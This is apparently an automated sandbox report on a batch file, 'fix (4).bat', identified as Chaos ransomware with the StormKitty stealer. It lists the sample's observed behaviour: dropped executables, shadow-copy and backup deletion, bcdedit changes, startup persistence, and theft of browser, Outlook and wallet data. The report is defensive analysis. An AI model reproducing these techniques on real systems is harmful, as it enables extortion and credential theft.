Malware Analysis Report

2025-04-13 21:19

Sample ID 250324-epe7aswwaz
Target fix (4).bat
SHA256 50c4082ed4c65e96649e53ba20fec89ead550d4774901dcccaf562db79a9e3e4
Tags
chaos stormkitty collection credential_access defense_evasion discovery evasion execution impact persistence privilege_escalation ransomware spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

50c4082ed4c65e96649e53ba20fec89ead550d4774901dcccaf562db79a9e3e4

Threat Level: Known bad

The file fix (4).bat was found to be: Known bad.

Malicious Activity Summary

chaos stormkitty collection credential_access defense_evasion discovery evasion execution impact persistence privilege_escalation ransomware spyware stealer

Chaos family

Chaos

Chaos Ransomware

StormKitty

Stormkitty family

StormKitty payload

Deletes shadow copies

Modifies boot configuration data using bcdedit

Disables Task Manager via registry modification

Uses browser remote debugging

Blocklisted process makes network request

Deletes backup catalog

Downloads MZ/PE file

Reads user/profile data of web browsers

Executes dropped EXE

Drops startup file

Drops desktop.ini file(s)

Accesses Microsoft Outlook profiles

Command and Scripting Interpreter: PowerShell

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Sets desktop wallpaper using registry

Drops file in Windows directory

Hide Artifacts: Ignore Process Interrupts

System Network Configuration Discovery: Wi-Fi Discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Browser Information Discovery

Event Triggered Execution: Netsh Helper DLL

Interacts with shadow copies

Suspicious use of WriteProcessMemory

outlook_win_path

Runs net.exe

Uses Volume Shadow Copy service COM API

Opens file in notepad (likely ransom note)

Suspicious use of FindShellTrayWindow

Checks SCSI registry key(s)

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Enumerates system info in registry

Checks processor information in registry

Suspicious behavior: AddClipboardFormatListener

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

outlook_office_path

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-03-24 04:06

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-03-24 04:06

Reported

2025-03-24 04:09

Platform

win11-20250313-en

Max time kernel

109s

Max time network

117s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\fix (4).bat"

Signatures

Chaos

ransomware chaos

Chaos Ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Chaos family

chaos

StormKitty

stealer stormkitty

StormKitty payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Stormkitty family

stormkitty

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Disables Task Manager via registry modification

defense_evasion

Downloads MZ/PE file

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\readme.txt C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.url C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\Pictures\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\OneDrive\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\AccountPictures\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\Libraries\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification F:\$RECYCLE.BIN\S-1-5-21-1136229799-3442283115-138161576-1000\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\Downloads\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Searches\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\Documents\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\Desktop\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\Music\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\xboyrybqu.jpg" C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\SystemTemp C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Hide Artifacts: Ignore Process Interrupts

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\System32\vds.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\MuiCache C:\Windows\system32\BackgroundTransferHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix C:\Windows\system32\BackgroundTransferHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\system32\BackgroundTransferHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\system32\BackgroundTransferHost.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Runs net.exe

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
